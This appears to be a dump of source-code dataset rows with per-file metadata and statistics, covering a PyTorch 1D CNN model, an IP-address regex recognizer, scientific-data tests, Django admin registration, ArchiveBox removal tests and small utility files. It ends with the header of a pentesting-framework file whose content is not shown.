2020-07-31T14:23:43.000Z
|
2020-07-31T14:23:43.000Z
|
# torch
import torch
import torch.nn as nn
# built-in
import functools
# project
import eerie
class OneDCNN(torch.nn.Module):
def __init__(self, use_bias=False):
super(OneDCNN, self).__init__()
# Parameters of the model
use_bias = False
eps = 2e-5
n_channels = 16
n_classes = 10
out_space_dim = 6
dp_rate = 0.25
# Conv Layers
self.c1 = torch.nn.Conv1d(in_channels=1, out_channels=n_channels, kernel_size=64, stride=2, padding=(64 // 2), dilation=1, bias=use_bias)
self.c2 = torch.nn.Conv1d(in_channels=n_channels, out_channels=n_channels * 2, kernel_size=32, stride=2, padding=(32 // 2), dilation=1, bias=use_bias)
self.c3 = torch.nn.Conv1d(in_channels=n_channels * 2, out_channels=n_channels * 4, kernel_size=16, stride=2, padding=(16 // 2), dilation=1, bias=use_bias)
self.c4 = torch.nn.Conv1d(in_channels=n_channels * 4, out_channels=n_channels * 8, kernel_size=8, stride=2, padding=(8 // 2), dilation=1, bias=use_bias)
self.c5 = torch.nn.Conv1d(in_channels=n_channels * 8, out_channels=n_channels * 16, kernel_size=4, stride=2, padding=(4 // 2), dilation=1, bias=use_bias)
# Fully connected
self.f1 = torch.nn.Linear(in_features=n_channels * 16 * out_space_dim, out_features=n_channels * 8, bias=True)
self.f2 = torch.nn.Linear(in_features=n_channels * 8, out_features=n_channels * 4, bias=True)
self.f3 = torch.nn.Linear(in_features=n_channels * 4, out_features=n_classes, bias=True)
# BatchNorm Layers
self.bn1 = torch.nn.BatchNorm1d(num_features=n_channels, eps=eps)
self.bn2 = torch.nn.BatchNorm1d(num_features=n_channels * 2, eps=eps)
self.bn3 = torch.nn.BatchNorm1d(num_features=n_channels * 4, eps=eps)
self.bn4 = torch.nn.BatchNorm1d(num_features=n_channels * 8, eps=eps)
self.bn5 = torch.nn.BatchNorm1d(num_features=n_channels * 16, eps=eps)
# Pooling
self.pool = torch.max_pool1d
# DropOut
self.dropout = torch.nn.Dropout(p=dp_rate)
# Initialization
for m in self.modules():
if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):
m.weight.data.normal_(0, torch.prod(torch.Tensor(list(m.weight.shape)[1:]))**(-1/2))
if use_bias: m.bias.data.fill_(0.0)
def forward(self, x):
# Conv-layers
out = self.bn1(torch.relu(self.c1(x)))
out = self.pool(out, kernel_size=8, stride=8, padding=0)
out = self.bn2(torch.relu(self.c2(out)))
out = self.pool(out, kernel_size=8, stride=8, padding=0)
out = self.bn3(torch.relu(self.c3(out)))
out = self.bn4(torch.relu(self.c4(out)))
out = self.bn5(torch.relu(self.c5(out)))
out = self.pool(out, kernel_size=5, stride=5, padding=0)
# Fully connected lyrs
out = out.view(out.size(0), -1)
out = self.dropout(self.f1(out))
out = self.dropout(self.f2(out))
out = self.f3(out)
return out
class RRPlus_OneDCNN(torch.nn.Module):
def __init__(self, use_bias=False):
super(RRPlus_OneDCNN, self).__init__()
# Parameters of the model
use_bias = False
eps = 2e-5
n_channels = 12
n_classes = 10
out_space_dim = 6
dp_rate = 0.25
# # G-conv approach
group = eerie.Group('R1R+')
# For first layer:
N_h_RdG = 9
base = 2
h_grid_RdG = group.h_grid_global(N_h_RdG, base ** (N_h_RdG - 1))
print(h_grid_RdG.grid)
N_h_crop = 3 # <--- TODO: not sure if this is the most optimal though, but it reduces the h_axis nicely to size 1 in the last layer
base = 2
h_grid_crop = group.h_grid_global(N_h_crop, base ** (N_h_crop - 1))
print(h_grid_crop.grid)
# Conv Layers
self.c1 = eerie.nn.GConvRdG(group, in_channels=1, out_channels=n_channels, kernel_size=63, h_grid=h_grid_RdG, bias=use_bias, stride=1)
self.c2 = eerie.nn.GConvGG(group, in_channels=n_channels, out_channels=n_channels * 2, kernel_size=31, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
self.c3 = eerie.nn.GConvGG(group, in_channels=n_channels * 2, out_channels=n_channels * 4, kernel_size=15, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
self.c4 = eerie.nn.GConvGG(group, in_channels=n_channels * 4, out_channels=n_channels * 8, kernel_size=7, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
self.c5 = eerie.nn.GConvGG(group, in_channels=n_channels * 8, out_channels=n_channels * 16, kernel_size=3, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
# Fully connected
self.f1 = torch.nn.Linear(in_features=n_channels * 16 * out_space_dim, out_features= n_channels * 8, bias=True)
self.f2 = torch.nn.Linear(in_features=n_channels * 8, out_features=n_channels * 4, bias=True)
self.f3 = torch.nn.Linear(in_features=n_channels * 4, out_features=n_classes, bias=True)
# BatchNorm Layers
self.bn1 = torch.nn.BatchNorm2d(num_features=n_channels, eps=eps)
self.bn2 = torch.nn.BatchNorm2d(num_features=n_channels * 2, eps=eps)
self.bn3 = torch.nn.BatchNorm2d(num_features=n_channels * 4, eps=eps)
self.bn4 = torch.nn.BatchNorm2d(num_features=n_channels * 8, eps=eps)
self.bn5 = torch.nn.BatchNorm2d(num_features=n_channels * 16, eps=eps)
# Pooling
self.pool = eerie.functional.max_pooling_R1
# DropOut
self.dropout = torch.nn.Dropout(p=dp_rate)
# Initialization
for m in self.modules():
if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):
m.weight.data.normal_(0, torch.prod(torch.Tensor(list(m.weight.shape)[1:]))**(-1/2))
if use_bias: m.bias.data.fill_(0.0)
def forward(self, x):
# Conv-layers
# We replace strided convolutions with normal convolutions followed by max pooling.
# -----
out = self.c1(x)
out = self.pool(out, kernel_size=2, stride=2, padding=0)
out = self.bn1(torch.relu(out))
# -----
out = self.pool(out, kernel_size=8, stride=8, padding=0)
# -----
out = self.c2(out)
out = self.pool(out, kernel_size=2, stride=2, padding=0)
out = self.bn2(torch.relu(out))
# -----
out = self.pool(out, kernel_size=8, stride=8, padding=0)
# -----
out = self.c3(out)
out = self.pool(out, kernel_size=2, stride=2, padding=0)
out = self.bn3(torch.relu(out))
# -----
out = self.c4(out)
out = self.pool(out, kernel_size=2, stride=2, padding=0)
out = self.bn4(torch.relu(out))
# -----
out = self.c5(out)
out = self.pool(out, kernel_size=2, stride=2, padding=0)
out = self.bn5(torch.relu(out))
# -----
out = self.pool(out, kernel_size=5, stride=5, padding=0)
# -----
# Fully connected lyrs
out = out.view(out.size(0), -1)
out = self.dropout(self.f1(out))
out = self.dropout(self.f2(out))
out = self.f3(out)
return out
if __name__ == '__main__':
from experiments.utils import num_params
# Sanity check
print('OneDCNN')
model = OneDCNN()
num_params(model)
model(torch.rand([2, 1, 64000]))
# Sanity check
print('RR+_OneDCNN')
model = RRPlus_OneDCNN()
num_params(model)
#model(torch.rand([2, 1, 50999]))
| 42.865922
| 173
| 0.615405
| 1,151
| 7,673
| 3.913988
| 0.139878
| 0.079911
| 0.075472
| 0.034184
| 0.83485
| 0.802886
| 0.790233
| 0.723418
| 0.706548
| 0.662375
| 0
| 0.04288
| 0.252313
| 7,673
| 178
| 174
| 43.106742
| 0.742374
| 0.082497
| 0
| 0.474138
| 0
| 0
| 0.004285
| 0
| 0
| 0
| 0
| 0.005618
| 0
| 1
| 0.034483
| false
| 0
| 0.043103
| 0
| 0.112069
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a89d76b501fc8c3eb7152f728483f5cfba44a0a8
| 1,425
|
py
|
Python
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 688
|
2019-05-08T02:56:21.000Z
|
2022-03-30T07:26:15.000Z
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 840
|
2019-05-07T07:00:02.000Z
|
2022-03-30T14:52:11.000Z
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 283
|
2019-05-07T07:52:12.000Z
|
2022-03-27T02:27:58.000Z
|
# ------------------------------------------------------------------------------
# <auto-generated>
# This code was generated by a tool.
# Changes to this file may cause incorrect behavior and will be lost if
# the code is regenerated.
# </auto-generated>
#
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# ------------------------------------------------------------------------------
# pylint: disable=line-too-long
from .base_ip import BaseIp
from .chinese_phone_numbers import ChinesePhoneNumbers as PhoneNumbersDefinitions
class ChineseIp:
Ipv4Regex = f'({PhoneNumbersDefinitions.WordBoundariesRegex}(1\\d{{2}}|2[0-4]\\d|25[0-5]|0?[1-9]\\d|0{{0,2}}\\d)((\\.(1\\d{{2}}|2[0-4]\\d|25[0-5]|0?[1-9]\\d|0{{0,2}}\\d)){{3}}){PhoneNumbersDefinitions.EndWordBoundariesRegex})'
Ipv6EllipsisRegexOther = f'({PhoneNumbersDefinitions.NonWordBoundariesRegex}::{PhoneNumbersDefinitions.NonWordBoundariesRegex}|{PhoneNumbersDefinitions.NonWordBoundariesRegex}:(:{BaseIp.BasicIpv6Element}){{1,7}}{PhoneNumbersDefinitions.WordBoundariesRegex}|{PhoneNumbersDefinitions.WordBoundariesRegex}({BaseIp.BasicIpv6Element}:){{1,7}}:{PhoneNumbersDefinitions.NonWordBoundariesRegex})'
Ipv6Regex = f'({PhoneNumbersDefinitions.WordBoundariesRegex}{BaseIp.MergedIpv6Regex}{PhoneNumbersDefinitions.WordBoundariesRegex})|({Ipv6EllipsisRegexOther})'
# pylint: enable=line-too-long
| 64.772727
| 392
| 0.680702
| 139
| 1,425
| 6.956835
| 0.517986
| 0.217166
| 0.022751
| 0.008273
| 0.136505
| 0.039297
| 0.039297
| 0.039297
| 0.039297
| 0.039297
| 0
| 0.031794
| 0.072982
| 1,425
| 21
| 393
| 67.857143
| 0.700227
| 0.338947
| 0
| 0
| 1
| 0.333333
| 0.768568
| 0.768568
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a8a5e433ca07963782a527a80f292c759dad5fea
| 1,972
|
py
|
Python
|
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
import vnmrjpy as vj
import unittest
import glob
import os
class Test_CsTestDataGenerator(unittest.TestCase):
def test_testdatagen_gems(self):
# directories
fid_dir = sorted(glob.glob(vj.fids+'/gems_s*'))[0]
base_dir = os.path.basename(fid_dir)[:-4]
red = 4
out_dir = vj.cs+'/'+base_dir+'_red'+str(red)+'.cs'
# filepaths
fid = fid_dir+'/fid'
procpar = fid_dir+'/procpar'
# generation
gen = vj.util.CsTestDataGenerator(fid,procpar,reduction=red)
gen.generate(savedir=out_dir)
def test_testdatagen_angio(self):
# directories
fid_dir = sorted(glob.glob(vj.fids+'/ge3d_angio*'))[0]
base_dir = os.path.basename(fid_dir)[:-4]
#cs reduction
red = 8
out_dir = vj.cs+'/'+base_dir+'_red'+str(red)+'.cs'
# filepaths
fid = fid_dir+'/fid'
procpar = fid_dir+'/procpar'
# generation
gen = vj.util.CsTestDataGenerator(fid,procpar,reduction=red)
gen.generate(savedir=out_dir)
def test_testdatagen_ge3d(self):
# directories
fid_dir = sorted(glob.glob(vj.fids+'/ge3d_s*'))[0]
base_dir = os.path.basename(fid_dir)[:-4]
red = 4
out_dir = vj.cs+'/'+base_dir+'_red'+str(red)+'.cs'
# filepaths
fid = fid_dir+'/fid'
procpar = fid_dir+'/procpar'
# generation
gen = vj.util.CsTestDataGenerator(fid,procpar,reduction=red)
gen.generate(savedir=out_dir)
def test_testdatagen_mems(self):
# directories
fid_dir = sorted(glob.glob(vj.fids+'/mems*'))[0]
base_dir = os.path.basename(fid_dir)[:-4]
red = 6
out_dir = vj.cs+'/'+base_dir+'_red'+str(red)+'.cs'
# filepaths
fid = fid_dir+'/fid'
procpar = fid_dir+'/procpar'
# generation
gen = vj.util.CsTestDataGenerator(fid,procpar,reduction=red)
gen.generate(savedir=out_dir)
| 30.8125
| 68
| 0.59432
| 252
| 1,972
| 4.460317
| 0.170635
| 0.085409
| 0.064057
| 0.074733
| 0.86032
| 0.86032
| 0.86032
| 0.86032
| 0.86032
| 0.761566
| 0
| 0.010323
| 0.263185
| 1,972
| 63
| 69
| 31.301587
| 0.763248
| 0.072515
| 0
| 0.634146
| 0
| 0
| 0.06281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.097561
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8b04281cbde5b29d59d6a4ca1058b0bd5741b5a
| 37
|
py
|
Python
|
sr_apx/vc/exact/__init__.py
|
TiP-internal/structural-rounding
|
5d033c9ce4bcd2aa72bf10976c07f4842dde2b76
|
[
"BSD-3-Clause"
] | 4
|
2019-10-17T02:29:48.000Z
|
2022-02-20T17:03:42.000Z
|
sr_apx/vc/exact/__init__.py
|
TheoryInPractice/structural-rounding
|
0aa961b9c8ecd4fd12f65302f6e95145ccb00cb6
|
[
"BSD-3-Clause"
] | 3
|
2020-02-12T09:06:17.000Z
|
2020-03-01T04:35:29.000Z
|
sr_apx/vc/exact/__init__.py
|
TiP-internal/structural-rounding
|
5d033c9ce4bcd2aa72bf10976c07f4842dde2b76
|
[
"BSD-3-Clause"
] | 1
|
2020-01-14T15:51:50.000Z
|
2020-01-14T15:51:50.000Z
|
from .lib_vc_exact import bip_exact
| 12.333333
| 35
| 0.837838
| 7
| 37
| 4
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 37
| 2
| 36
| 18.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76aa3d7d672d6a2ecbf3c9815d8ffb50c31a1681
| 195
|
py
|
Python
|
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | null | null | null |
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | 3
|
2020-02-12T03:16:51.000Z
|
2021-06-10T22:10:51.000Z
|
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(UserProfile)
admin.site.register(Biz)
admin.site.register(Post)
admin.site.register(Mtaa)
| 21.666667
| 32
| 0.8
| 28
| 195
| 5.571429
| 0.5
| 0.230769
| 0.435897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 195
| 8
| 33
| 24.375
| 0.881356
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
76bbc0095577466a3714f26fdec5af50c670e39f
| 6,901
|
py
|
Python
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 6,340
|
2018-12-20T21:12:13.000Z
|
2020-11-23T02:39:32.000Z
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 388
|
2018-12-20T07:58:08.000Z
|
2020-11-23T03:20:36.000Z
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 439
|
2018-12-21T21:51:47.000Z
|
2020-11-21T21:21:35.000Z
|
import os
import sqlite3
from .fixtures import *
def test_remove_single_page(tmp_path, process, disable_extractors_dict):
os.chdir(tmp_path)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
remove_process = subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes'], capture_output=True)
assert "Found 1 matching URLs to remove" in remove_process.stdout.decode("utf-8")
conn = sqlite3.connect("index.sqlite3")
c = conn.cursor()
count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
conn.commit()
conn.close()
assert count == 0
def test_remove_single_page_filesystem(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes', '--delete'], capture_output=True)
assert list((tmp_path / "archive").iterdir()) == []
def test_remove_regex(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete'], capture_output=True)
assert list((tmp_path / "archive").iterdir()) == []
def test_remove_exact(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
remove_process = subprocess.run(['archivebox', 'remove', '--filter-type=exact', 'http://127.0.0.1:8080/static/iana.org.html', '--yes', '--delete'], capture_output=True)
assert len(list((tmp_path / "archive").iterdir())) == 1
def test_remove_substr(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
subprocess.run(['archivebox', 'remove', '--filter-type=substring', 'example.com', '--yes', '--delete'], capture_output=True)
assert len(list((tmp_path / "archive").iterdir())) == 1
def test_remove_domain(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
remove_process = subprocess.run(['archivebox', 'remove', '--filter-type=domain', '127.0.0.1', '--yes', '--delete'], capture_output=True)
assert len(list((tmp_path / "archive").iterdir())) == 0
conn = sqlite3.connect("index.sqlite3")
c = conn.cursor()
count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
conn.commit()
conn.close()
assert count == 0
def test_remove_tag(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
conn = sqlite3.connect("index.sqlite3")
c = conn.cursor()
c.execute("INSERT INTO core_tag (id, name, slug) VALUES (2, 'test-tag', 'test-tag')")
snapshot_ids = c.execute("SELECT id from core_snapshot")
c.executemany('INSERT INTO core_snapshot_tags (snapshot_id, tag_id) VALUES (?, 2)', list(snapshot_ids))
conn.commit()
remove_process = subprocess.run(['archivebox', 'remove', '--filter-type=tag', 'test-tag', '--yes', '--delete'], capture_output=True)
assert len(list((tmp_path / "archive").iterdir())) == 0
count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
conn.commit()
conn.close()
assert count == 0
def test_remove_before(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
conn = sqlite3.connect("index.sqlite3")
c = conn.cursor()
higherts, lowerts = timestamp = c.execute("SELECT timestamp FROM core_snapshot ORDER BY timestamp DESC").fetchall()
conn.commit()
conn.close()
lowerts = lowerts[0]
higherts = higherts[0]
# before is less than, so only the lower snapshot gets deleted
subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete', '--before', higherts], capture_output=True)
assert not (tmp_path / "archive" / lowerts).exists()
assert (tmp_path / "archive" / higherts).exists()
def test_remove_after(tmp_path, process, disable_extractors_dict):
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
conn = sqlite3.connect("index.sqlite3")
c = conn.cursor()
higherts, lowerts = c.execute("SELECT timestamp FROM core_snapshot ORDER BY timestamp DESC").fetchall()
conn.commit()
conn.close()
lowerts = lowerts[0].split(".")[0]
higherts = higherts[0].split(".")[0]
# after is greater than or equal to, so both snapshots get deleted
subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete', '--after', lowerts], capture_output=True)
assert not (tmp_path / "archive" / lowerts).exists()
assert not (tmp_path / "archive" / higherts).exists()
| 51.118519
| 172
| 0.689465
| 933
| 6,901
| 4.947481
| 0.118971
| 0.042461
| 0.113735
| 0.025997
| 0.872184
| 0.852253
| 0.841854
| 0.841854
| 0.830589
| 0.829506
| 0
| 0.037508
| 0.123026
| 6,901
| 134
| 173
| 51.5
| 0.725215
| 0.018113
| 0
| 0.634409
| 0
| 0.010753
| 0.308431
| 0.003396
| 0
| 0
| 0
| 0
| 0.236559
| 1
| 0.096774
| false
| 0
| 0.032258
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76bd2b009fe8016d455684617aedaeea8b7befd3
| 263
|
py
|
Python
|
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | 1
|
2019-01-04T12:01:45.000Z
|
2019-01-04T12:01:45.000Z
|
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | null | null | null |
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class PfigAttributeError(Exception):
"""
Exception raised when a attribute is wrong or missing
"""
pass
class PfigTransactionError(Exception):
"""
Exception raised when a transaction is failed.
"""
pass
| 16.4375
| 57
| 0.638783
| 27
| 263
| 6.222222
| 0.666667
| 0.214286
| 0.285714
| 0.333333
| 0.345238
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005102
| 0.254753
| 263
| 15
| 58
| 17.533333
| 0.852041
| 0.467681
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
4f134118e50400883be8aed80826ef9f04eb6691
| 87
|
py
|
Python
|
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | null | null | null |
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | 201
|
2019-05-20T15:06:05.000Z
|
2019-07-16T12:48:59.000Z
|
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | 1
|
2019-12-20T21:45:39.000Z
|
2019-12-20T21:45:39.000Z
|
import tfchain.tests.crypto.crypto as cryptotest
def tests():
cryptotest.tests()
| 17.4
| 49
| 0.747126
| 11
| 87
| 5.909091
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 4
| 50
| 21.75
| 0.878378
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4f177f0ad5ba7358e30e6147e6fcff09844b9b56
| 48
|
py
|
Python
|
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | 3
|
2020-10-21T12:25:12.000Z
|
2020-10-21T12:33:22.000Z
|
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | null | null | null |
def test_should_get_from_file():
assert True
| 24
| 32
| 0.791667
| 8
| 48
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 48
| 2
| 33
| 24
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4f937cdce482febf55cd7053602d46b0356b7f57
| 40,984
|
py
|
Python
|
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | 5
|
2018-01-07T17:11:31.000Z
|
2018-06-05T17:31:07.000Z
|
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | null | null | null |
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | 1
|
